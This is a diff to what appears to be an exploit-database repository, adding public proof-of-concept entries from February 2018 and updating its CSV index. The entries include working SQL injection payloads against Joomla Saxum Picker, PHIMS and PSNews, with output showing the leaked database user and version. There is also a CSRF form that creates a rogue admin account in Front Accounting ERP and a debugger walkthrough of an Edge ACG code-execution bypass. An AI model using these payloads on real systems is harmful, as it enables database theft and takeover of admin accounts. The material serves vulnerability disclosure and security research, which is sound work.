+# Exploit Title: Joomla! Component Saxum Picker 3.2.10 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://www.saxum2003.hu/
+# Software Link: https://extensions.joomla.org/extensions/extension/sports-a-games/games/saxumpicker/
+# Software Download: http://www.saxum2003.hu/downloadsen/file/97-picker32.html
+# Version: 3.2.10
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-7178
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# # # # #
+# 
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_saxumpicker&view=savedspread&publicid=[SQL]
+# 
+# JTMxJTI3JTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTM2JTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTI5JTI5JTJkJTJkJTIwJTJk
+# 
+# # # # #
+
+
+
+
+
+http://localhost/Joomla375/index.php?option=com_saxumpicker&view=savedspread&publicid=1' AND EXTRACTVALUE(66,CONCAT(0x5c,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66,1)))))-- -
+1105 XPATH syntax error: '\root@localhost : joomla375 : 10'

exploits/php/webapps/44137.html

@@ -0,0 +1,57 @@
+<!--
+​​# Exploit Title: Front Accounting ERP 2.4.3 - CSRF
+# Date: 16-02-2018
+# Exploit Author: Samrat Das
+# Contact: http://twitter.com/Samrat_Das93
+# Website: https://securitywarrior9.blogspot.in/
+# Vendor Homepage: frontaccounting.com
+# Version: 2.4.3
+# CVE : CVE-2018-7176
+# Category: WebApp ERP
+
+1. Description
+
+The application source code is coded in a way which allows malicious
+crafted HTML page to be executed directly without any anti csrf
+countermeasures.
+
+2. Proof of Concept
+
+1.       Visit the application
+2.       Visit the User Permissions Page.
+3.        Goto add user, and create a csrf crafted exploit for the same ,
+upon hosting it on a server and sending the link to click by victim, it
+gets exploited.
+
+Proof of Concept
+
+Steps to Reproduce:
+
+1. Create an HTML Page with the below exploit code:
+-->
+
+<html>
+ <body>
+    <form action="
+http://localhost/frontaccounting/admin/users.php?JsHttpRequest=0-xml"
+method="POST" enctype="text/plain">
+      <input type="hidden" name="show&#95;inactive"
+value="&user&#95;id&#61;Newadmin&password&#61;Newadmin&real&#95;name&#61;New&#37;20Admin&phone&#61;&email&#61;&role&#95;id&#61;8&language&#61;C&pos&#61;1&print&#95;profile&#61;&rep&#95;popup&#61;1&ADD&#95;ITEM&#61;Add&#37;20new&&#95;focus&#61;user&#95;id&&#95;modified&#61;0&&#95;confirmed&#61;&&#95;token&#61;Ta6aiT2xqlL2vg8u9aAvagxx&&#95;random&#61;757897&#46;6552143205"
+/>
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+<!--
+2  This hosted page upon being clicked by an logged in admin user will lead
+to creation of a new malicious admin user.
+
+3 POCs and steps:
+https://securitywarrior9.blogspot.in/2018/02/cross-site-request-forgery-front.html
+
+4. Solution:
+
+Implement anti csrf token code in state changing http requests and validate
+it at server side.
+-->

exploits/php/webapps/44138.txt

@@ -0,0 +1,33 @@
+# Exploit Title:  PHIMS - Hospital Management Information System - 'Password' SQL Injection
+# Dork: N/A
+# Date: 2018-02-16
+# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
+# Vendor Homepage: https://codecanyon.net/item/phims/14974225?s_rank=1566
+# Version: All version
+# Category: Webapps
+# CVE: N/A
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands.
+# # # # #
+# Proof of Concept :
+
+SQLI :
+
+
+# Parameter : Password (POST)
+#    Type: Error based
+#    Title:  MariaDB >= 10.2.11 AND Error based - extractvalue (XPATH query)
+#    Payload : 1" and extractvalue(1,concat(0x3a,user(),0x3a,version()))#
+#######################################
+# Discrption : The 'password' field is vulnerable in this script
+('Password' parameter).First inject payload into this parameter.
+# then put anything in username (like:anything@anything.anything) and click
+login. You will have XPATH syntax
+error in the next page that contains user and db_name .
+# You can find all tables and any information from database by using XPATH
+query .
+
+
+Username : anything@anything.anything
+Password : 1" and extractvalue(1,concat(0x3a,user(),0x3a,version()))#

exploits/php/webapps/44140.txt

@@ -0,0 +1,28 @@
+# Exploit Title:  PSNews Website (Same Backend with Mobile Apps) 1.0.0 - 'Keywords' SQL Injection
+# Dork: N/A
+# Date: 2018-02-16
+# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
+# Vendor Homepage: https://codecanyon.net/item/psnews-website/21360354?s_rank=9
+# Version: 1.0.0
+# Category: Webapps
+# CVE: N/A
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands.
+# # # # #
+# Proof of Concept :
+
+SQLI :
+
+http://server/index.php/search
+
+# Parameter : keywords (POST)
+#    Type: Error based
+#    Title:  Mysql >= 5.6.33 AND Error based - updatexml (XPATH query)
+#    Payload : ' or updatexml(1, concat(0x3a,user(),0x3a,database()),1)
+#######################################
+# Discrption : Put this payload in the search field.then you will have
+XPATH syntax error in the next page.
+
+Test : http://server/index.php/search
+Payload : ' or updatexml(1, concat(0x3a,user(),0x3a,database()),1)

exploits/windows/dos/44096.txt

@@ -0,0 +1,196 @@
+Background:
+
+To implement ACG (https://blogs.windows.com/msedgedev/2017/02/23/mitigating-arbitrary-native-code-execution/#VM4y5oTSGCRde3sk.97), Edge uses a separate process for JIT compiling. This JIT Process is also responsible for mapping native code into the requesting Content Process.
+
+In order to be able to write JITted (executable) data into the Content Process, JIT Process does the following:
+
+1. It creates a shared memory object using CreateFileMapping()
+2. It maps it into Content Process as PAGE_EXECUTE_READ and in the JIT proces as PAGE_READWRITE using MapViewOfFile2(). At this point the memory is reserved, but not yet committed.
+3. When individual pages need to be written to they are first allocated from the region in step 2 using VirtualAllocEx(). This also marks the memory as committed.
+
+The issue:
+
+If a content process is compromised and the content process can predict on which address JIT process is going to call VirtualAllocEx() next (note: it is fairly predictable), content process can:
+
+1. Unmap the shared memory mapped above above using UnmapViewOfFile()
+2. Allocate a writable memory region on the same address JIT server is going to write and write an soon-to-be-executable payload there.
+3. When JIT process calls VirtualAllocEx(), even though the memory is already allocated, the call is going to succeed and the memory protection is going to be set to PAGE_EXECUTE_READ. 
+
+Note #1: The content written in step 2 is going to survive the memory protection change.
+Note #2: JIT server is going to write the JITted payload into its own "side" of the shared memory, so the content in the Content Process is not going to get immediately overwritten.
+
+See the debug log below for a demonstration.
+
+Debug log:
+
+Let's attach one instance of WinDBG to JIT process and another to a Content Process.
+
+Let's also verify that ACG is indeed applied for the Content Process. We can do this using Get-ProcessMitigation PowerShell command. See the output in the screenshot (note the "BlockDynamicCode: ON" field).
+
+Now, in JIT Process, let's set a breakpoint on VirtualAllocEx() and wait.
+
+0:020> bp kernelbase!virtualallocex
+0:020> g
+
+Soon the breakpoint is hit.
+
+Breakpoint 0 hit
+KERNELBASE!VirtualAllocEx:
+00007fff`5590e170 4883ec38        sub     rsp,38h
+
+We can examine the call stack to see where we are - we see we are in the Encode phase of ServerRemoteCodeGen() which is a function that Content Process calls on the JIT server when it wants to JIT a function or a loop body.
+
+0:011> k
+ # Child-SP          RetAddr           Call Site
+00 000000c2`48cfcfe8 00007fff`4dff3104 KERNELBASE!VirtualAllocEx
+01 000000c2`48cfcff0 00007fff`38752dcd EShims!NS_ACGLockdownTelemetry::APIHook_VirtualAllocEx+0x14
+02 000000c2`48cfd030 00007fff`38752a16 chakra!Memory::PreReservedSectionAllocWrapper::Alloc+0xd5
+03 000000c2`48cfd0b0 00007fff`3875233e chakra!Memory::PageSegmentBase<Memory::PreReservedSectionAllocWrapper>::AllocDecommitPages<BVStatic<272>,1>+0xea
+04 000000c2`48cfd150 00007fff`38752464 chakra!Memory::PageAllocatorBase<Memory::PreReservedSectionAllocWrapper,Memory::SegmentBase<Memory::PreReservedSectionAllocWrapper>,Memory::PageSegmentBase<Memory::PreReservedSectionAllocWrapper> >::TryAllocDecommittedPages<1>+0x8e
+05 000000c2`48cfd210 00007fff`38751e7a chakra!Memory::PageAllocatorBase<Memory::PreReservedSectionAllocWrapper,Memory::SegmentBase<Memory::PreReservedSectionAllocWrapper>,Memory::PageSegmentBase<Memory::PreReservedSectionAllocWrapper> >::SnailAllocPages<1>+0x4c
+06 000000c2`48cfd2d0 00007fff`38751488 chakra!Memory::CustomHeap::CodePageAllocators<Memory::SectionAllocWrapper,Memory::PreReservedSectionAllocWrapper>::AllocPages+0x72
+07 000000c2`48cfd340 00007fff`38751210 chakra!Memory::CustomHeap::Heap<Memory::SectionAllocWrapper,Memory::PreReservedSectionAllocWrapper>::AllocNewPage+0x68
+08 000000c2`48cfd3c0 00007fff`38750e14 chakra!Memory::CustomHeap::Heap<Memory::SectionAllocWrapper,Memory::PreReservedSectionAllocWrapper>::Alloc+0x9c
+09 000000c2`48cfd470 00007fff`38750cae chakra!EmitBufferManager<Memory::SectionAllocWrapper,Memory::PreReservedSectionAllocWrapper,CriticalSection>::NewAllocation+0x58
+0a 000000c2`48cfd500 00007fff`388599dc chakra!JITOutput::RecordOOPNativeCodeSize+0x8e
+0b 000000c2`48cfd590 00007fff`388a5506 chakra!Encoder::Encode+0x9dc
+0c 000000c2`48cfd710 00007fff`389904e5 chakra!Func::TryCodegen+0x356
+0d 000000c2`48cfdfb0 00007fff`3877c00e chakra!Func::Codegen+0xed
+0e 000000c2`48cfe3e0 00007fff`3877be54 chakra!<lambda_869fb2da08ff617a0f58153cb1331989>::operator()+0x166
+0f 000000c2`48cfe500 00007fff`3877bde2 chakra!ServerCallWrapper<<lambda_869fb2da08ff617a0f58153cb1331989> >+0x54
+10 000000c2`48cfe550 00007fff`3877bd85 chakra!ServerCallWrapper<<lambda_869fb2da08ff617a0f58153cb1331989> >+0x4e
+11 000000c2`48cfe5c0 00007fff`57006d13 chakra!ServerRemoteCodeGen+0x75
+12 000000c2`48cfe630 00007fff`57069390 RPCRT4!Invoke+0x73
+13 000000c2`48cfe690 00007fff`56f93718 RPCRT4!Ndr64StubWorker+0xbb0
+14 000000c2`48cfed40 00007fff`56fb73b4 RPCRT4!NdrServerCallNdr64+0x38
+15 000000c2`48cfed90 00007fff`56fb654e RPCRT4!DispatchToStubInCNoAvrf+0x24
+16 000000c2`48cfede0 00007fff`56fb6f84 RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x1be
+17 000000c2`48cfeeb0 00007fff`56fc0693 RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x154
+18 000000c2`48cfef50 00007fff`56fc1396 RPCRT4!LRPC_SCALL::DispatchRequest+0x183
+19 000000c2`48cff030 00007fff`56fbd11e RPCRT4!LRPC_SCALL::HandleRequest+0x996
+1a 000000c2`48cff140 00007fff`56fbe843 RPCRT4!LRPC_ADDRESS::HandleRequest+0x34e
+1b 000000c2`48cff1f0 00007fff`56fecc58 RPCRT4!LRPC_ADDRESS::ProcessIO+0x8a3
+1c 000000c2`48cff330 00007fff`594665ae RPCRT4!LrpcIoComplete+0xd8
+1d 000000c2`48cff3d0 00007fff`594aeed9 ntdll!TppAlpcpExecuteCallback+0x22e
+1e 000000c2`48cff450 00007fff`5946471c ntdll!TppDirectExecuteCallback+0xb9
+1f 000000c2`48cff4c0 00007fff`57ea1fe4 ntdll!TppWorkerThread+0x47c
+20 000000c2`48cff850 00007fff`5949ef91 KERNEL32!BaseThreadInitThunk+0x14
+21 000000c2`48cff880 00000000`00000000 ntdll!RtlUserThreadStart+0x21
+
+If we examine the registers we see the second param is 000002854f18c000 - this is the address VirtualAllocEx() is attempting to allocate.
+
+0:011> r
+rax=0000000040000010 rbx=000002854f18c000 rcx=0000000000000724
+rdx=000002854f18c000 rsi=0000000000000008 rdi=0000024038924de0
+rip=00007fff5590e170 rsp=000000c248cfcfe8 rbp=0000024038924fe8
+ r8=0000000000001000  r9=0000000000001000 r10=0000000000000001
+r11=0000000000000007 r12=000002854f18c000 r13=0000000000000000
+r14=000000000000000c r15=0000000000000000
+
+Let's leave the JIT Process alone for a while and move into the Content Process. Let's examine the memory around address 000002854f18c000 using !vadump:
+
+BaseAddress:       000002854f100000
+RegionSize:        0000000000017000
+State:             00001000  MEM_COMMIT
+Protect:           00000010  PAGE_EXECUTE
+Type:              00040000  MEM_MAPPED
+
+BaseAddress:       000002854f117000
+RegionSize:        0000000000001000
+State:             00001000  MEM_COMMIT
+Protect:           00000001  PAGE_NOACCESS
+Type:              00040000  MEM_MAPPED
+
+BaseAddress:       000002854f118000
+RegionSize:        0000000000074000
+State:             00001000  MEM_COMMIT
+Protect:           00000010  PAGE_EXECUTE
+Type:              00040000  MEM_MAPPED
+
+BaseAddress:       000002854f18c000
+RegionSize:        0000000000004000
+State:             00002000  MEM_RESERVE
+Type:              00040000  MEM_MAPPED
+
+BaseAddress:       000002854f190000
+RegionSize:        0000000000010000
+State:             00001000  MEM_COMMIT
+Protect:           00000010  PAGE_EXECUTE
+Type:              00040000  MEM_MAPPED
+
+We see some executable memory regions starting from 000002854f100000 which happens to be the base address of the shared memory in the Content Process. Let's unmap it.
+
+0:084> r rip=kernelbase!unmapviewoffile
+0:084> r rcx=000002854f100000
+
+After unmapping it, let's allocate the desired address and set it to PAGE_READWRITE so that we can write to it.
+
+0:084> r rip=kernelbase!virtualalloc
+0:084> r rcx=000002854f18c000 # desired address
+0:084> r rdx=1000 # size
+0:084> r r8=3000 # MEM_RESERVE | MEM_COMMIT
+0:084> r r9=4 # PAGE_READWRITE
+
+After VirtualAlloc() finishes, we can see it returned 000002854f180000
+
+0:084> r rax
+rax=000002854f180000
+
+The returned address is a bit lower than the one we requested, but it doesn't matter since the allocated region is also going to be larger than we requested so it's going to cover the desired address. Let's take a look at the memory map again:
+
+BaseAddress:       000002854f100000
+RegionSize:        0000000000080000
+State:             00010000  MEM_FREE
+Protect:           00000001  PAGE_NOACCESS
+
+BaseAddress:       000002854f180000
+RegionSize:        000000000000d000
+State:             00001000  MEM_COMMIT
+Protect:           00000004  PAGE_READWRITE
+Type:              00020000  MEM_PRIVATE
+
+BaseAddress:       000002854f18d000
+RegionSize:        000000000ff73000
+State:             00010000  MEM_FREE
+Protect:           00000001  PAGE_NOACCESS
+
+We can see that at address 000002854f180000 there is a region of size 000000000000d000 that has PAGE_READWRITE access. Since we can now write to this address, let's do it:
+
+0:084> ea 000002854f18c000 "ACG bypass"
+
+Now, let's go back to the JIT Server process and let VirtualAllocEx() finish. Once it does, let's go back into the Content Process and examine the memory again:
+
+BaseAddress:       000002854f100000
+RegionSize:        0000000000080000
+State:             00010000  MEM_FREE
+Protect:           00000001  PAGE_NOACCESS
+
+BaseAddress:       000002854f180000
+RegionSize:        000000000000c000
+State:             00001000  MEM_COMMIT
+Protect:           00000004  PAGE_READWRITE
+Type:              00020000  MEM_PRIVATE
+
+BaseAddress:       000002854f18c000
+RegionSize:        0000000000001000
+State:             00001000  MEM_COMMIT
+Protect:           00000010  PAGE_EXECUTE
+Type:              00020000  MEM_PRIVATE
+
+BaseAddress:       000002854f18d000
+RegionSize:        000000000ff73000
+State:             00010000  MEM_FREE
+Protect:           00000001  PAGE_NOACCESS
+
+We can now see some changes, specifically at address 000002854f18c000 there is now an executable memory region (PAGE_EXECUTE). Now we just need to make sure the content we wrote earlier is still there.
+
+0:084> da 000002854f18c000
+00000285`4f18c000  "ACG bypass"
+
+That's it. We now have an executable page with the content we control, thus bypassing ACG.
+
+A screenshot of WinDBG showing this final step is attached.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44096.zip

files_exploits.csv

@@ -5507,6 +5507,9 @@ id,file,description,date,author,type,platform,port
 44082,exploits/multiple/dos/44082.txt,"Pdfium - Pattern Shading Integer Overflows",2018-02-15,"Google Security Research",dos,multiple,
 44083,exploits/multiple/dos/44083.txt,"Pdfium - Out-of-Bounds Read with Shading Pattern Backed by Pattern Colorspace",2018-02-15,"Google Security Research",dos,multiple,
 44084,exploits/multiple/dos/44084.js,"Chrome V8 - 'Runtime_RegExpReplace' Integer Overflow",2018-02-15,"Google Security Research",dos,multiple,
+44096,exploits/windows/dos/44096.txt,"Microsoft Edge - 'UnmapViewOfFile' ACG Bypass",2018-02-16,"Google Security Research",dos,windows,
+44099,exploits/multiple/dos/44099.txt,"JBoss Remoting 6.14.18 - Denial of Service",2018-02-16,"Frank Spierings",dos,multiple,
+44103,exploits/hardware/dos/44103.py,"Siemens SIPROTEC 4 and SIPROTEC Compact EN100 Ethernet Module < 4.25 - Denial of Service",2018-02-16,"M. Can Kurnaz",dos,hardware,50000
 41643,exploits/hardware/dos/41643.txt,"Google Nest Cam 5.2.1
 - Buffer Overflow Conditions Over Bluetooth LE",2017-03-20,"Jason Doyle",dos,hardware,
 41645,exploits/windows/dos/41645.txt,"Microsoft Windows Kernel - Registry Hive Loading Crashes in nt!nt!HvpGetBinMemAlloc / nt!ExpFindAndRemoveTagBigPages (MS17-017)",2017-03-20,"Google Security Research",dos,windows,
 41646,exploits/windows/dos/41646.txt,"Microsoft Windows - Uniscribe Font Processing Out-of-Bounds Read in usp10!otlChainRuleSetTable::rule (MS17-011)",2017-03-20,"Google Security Research",dos,windows,
@@ -9343,6 +9346,7 @@ id,file,description,date,author,type,platform,port
 44063,exploits/windows/local/44063.md,"Nitro Pro PDF - Multiple Vulnerabilities",2017-07-24,SecuriTeam,local,windows,
 44064,exploits/linux/local/44064.md,"Odoo CRM 10.0 - Code Execution",2017-06-30,SecuriTeam,local,linux,
 44066,exploits/windows/local/44066.md,"Dashlane - DLL Hijacking",2017-08-03,SecuriTeam,local,windows,
+44097,exploits/linux/local/44097.rb,"ABRT - raceabrt Privilege Escalation(Metasploit)",2018-02-16,Metasploit,local,linux,
 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@@ -22044,7 +22048,7 @@ id,file,description,date,author,type,platform,port
 9819,exploits/multiple/webapps/9819.txt,"Engeman 6.x - SQL Injection",2009-09-25,crashbrz,webapps,multiple,
 9820,exploits/php/webapps/9820.txt,"Regental Medien - Blind SQL Injection",2009-09-24,NoGe,webapps,php,
 9821,exploits/php/webapps/9821.txt,"FSphp 0.2.1 - Remote File Inclusion",2009-09-24,NoGe,webapps,php,
-9822,exploits/php/webapps/9822.txt,"Joomla! Component Fastball 1.1.0 < 1.2 - SQL Injection",2009-09-24,kaMtiEz,webapps,php,
+9822,exploits/php/webapps/9822.txt,"Joomla! Component Fastball 1.1.0 < 1.2 - 'league' SQL Injection",2009-09-24,kaMtiEz,webapps,php,
 9824,exploits/php/webapps/9824.txt,"Swiss Mango CMS - SQL Injection",2009-09-24,kaMtiEz,webapps,php,
 9825,exploits/php/webapps/9825.txt,"e107 0.7.16 - Referer header Cross-Site Scripting",2009-09-24,MustLive,webapps,php,
 9826,exploits/php/webapps/9826.txt,"MindSculpt CMS - SQL Injection",2009-09-24,kaMitEz,webapps,php,
@@ -38087,7 +38091,48 @@ id,file,description,date,author,type,platform,port
 44070,exploits/hardware/webapps/44070.md,"Cisco DPC3928 Router - Arbitrary File Disclosure",2017-05-10,SecuriTeam,webapps,hardware,
 44071,exploits/windows/webapps/44071.md,"IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities",2017-06-08,SecuriTeam,webapps,windows,
 44072,exploits/hardware/webapps/44072.md,"Geneko Routers - Unauthenticated Path Traversal",2017-07-16,SecuriTeam,webapps,hardware,
-44074,exploits/hardware/webapps/44074.md,"Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution",2017-12-06,SecuriTeam,webapps,hardware,
+44074,exploits/hardware/webapps/44074.md,"Dasan Networks GPON ONT WiFi Router H640X 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution",2017-12-06,SecuriTeam,webapps,hardware,
+44098,exploits/asp/webapps/44098.txt,"EPIC MyChart - SQL Injection",2018-02-16,"Shayan S",webapps,asp,443
+44100,exploits/php/webapps/44100.txt,"TV - Video Subscription - Authentication Bypass SQL Injection",2018-02-16,L0RD,webapps,php,80
+44101,exploits/php/webapps/44101.py,"UserSpice 4.3 - Blind SQL Injection",2018-02-16,"Dolev Farhi",webapps,php,80
+44102,exploits/php/webapps/44102.txt,"Twig < 2.4.4 - Server Side Template Injection",2018-02-16,JameelNabbo,webapps,php,80
+44104,exploits/php/webapps/44104.txt,"Joomla! Component Kubik-Rubik Simple Image Gallery Extended (SIGE) 3.2.3 - Cross-Site Scripting",2018-02-16,"Alwin Peppels",webapps,php,80
+44105,exploits/php/webapps/44105.txt,"Joomla! Component Advertisement Board 3.1.0 - 'catname' SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44106,exploits/php/webapps/44106.txt,"Joomla! Component Aist 2.0 - 'id' SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44107,exploits/php/webapps/44107.txt,"Joomla! Component AllVideos Reloaded 1.2.x - 'divid' SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44108,exploits/php/webapps/44108.txt,"Joomla! Component DT Register 3.2.7 - 'id' SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44109,exploits/php/webapps/44109.txt,"Joomla! Component Fastball 2.5 - 'season' SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44110,exploits/php/webapps/44110.txt,"Joomla! Component File Download Tracker 3.0 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44111,exploits/php/webapps/44111.txt,"Joomla! Component Form Maker 3.6.12 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44112,exploits/php/webapps/44112.txt,"Joomla! Component Gallery WD 1.3.6 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44113,exploits/php/webapps/44113.txt,"Joomla! Component Google Map Landkarten 4.2.3 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44114,exploits/php/webapps/44114.txt,"Joomla! Component InviteX 3.0.5 - 'invite_type' SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44115,exploits/php/webapps/44115.txt,"Joomla! Component JB Bus 2.3 - 'order_number' SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44116,exploits/php/webapps/44116.txt,"Joomla! Component jGive 2.0.9 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44117,exploits/php/webapps/44117.txt,"Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44118,exploits/php/webapps/44118.txt,"Joomla! Component JquickContact 1.3.2.2.1 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44119,exploits/php/webapps/44119.txt,"Joomla! Component JS Autoz 1.0.9 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44120,exploits/php/webapps/44120.txt,"Joomla! Component JS Jobs 1.1.9 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44121,exploits/php/webapps/44121.txt,"Joomla! Component JTicketing 2.0.16 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44122,exploits/php/webapps/44122.txt,"Joomla! Component MediaLibrary Free 4.0.12 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44123,exploits/php/webapps/44123.txt,"Joomla! Component NeoRecruit 4.1 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44124,exploits/php/webapps/44124.txt,"Joomla! Component Project Log 1.5.3 - 'search' SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44125,exploits/php/webapps/44125.txt,"Joomla! Component Realpin 1.5.04 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44126,exploits/php/webapps/44126.txt,"Joomla! Component SimpleCalendar 3.1.9 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44127,exploits/php/webapps/44127.txt,"Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44128,exploits/php/webapps/44128.txt,"Joomla! Component Solidres 2.5.1 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44129,exploits/php/webapps/44129.txt,"Joomla! Component Staff Master 1.0 RC 1 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44130,exploits/php/webapps/44130.txt,"Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - 'alias' SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44131,exploits/php/webapps/44131.txt,"Joomla! Pinterest Clone Social Pinboard 2.0 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44132,exploits/php/webapps/44132.txt,"Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44133,exploits/php/webapps/44133.txt,"Joomla! Component Saxum Astro 4.0.14 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44134,exploits/php/webapps/44134.txt,"Joomla! Component Saxum Numerology 3.0.4 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44135,exploits/php/webapps/44135.txt,"Joomla! Component SquadManagement 1.0.3 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44136,exploits/php/webapps/44136.txt,"Joomla! Component Saxum Picker 3.2.10 - SQL Injection",2018-02-16,"Ihsan Sencan",webapps,php,80
+44137,exploits/php/webapps/44137.html,"Front Accounting ERP 2.4.3 - Cross-Site Request Forgery",2018-02-16,"Samrat Das",webapps,php,
+44138,exploits/php/webapps/44138.txt,"PHIMS - Hospital Management Information System - 'Password' SQL Injection",2018-02-16,L0RD,webapps,php,
+44140,exploits/php/webapps/44140.txt,"PSNews Website 1.0.0 - 'Keywords' SQL Injection",2018-02-16,L0RD,webapps,php,80
+44141,exploits/multiple/webapps/44141.txt,"Oracle Primavera P6 Enterprise Project Portfolio Management - HTTP Response Splitting",2018-02-16,"Marios Nicolaides",webapps,multiple,
 41641,exploits/php/webapps/41641.txt,"Joomla! Component JooCart 2.x - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41642,exploits/php/webapps/41642.txt,"Joomla! Component jCart for OpenCart 2.0 - 'product_id' SQL Injection",2017-03-20,"Ihsan Sencan",webapps,php,
 41644,exploits/php/webapps/41644.txt,"phplist 3.2.6 - SQL Injection",2017-03-20,"Curesec Research Team",webapps,php,80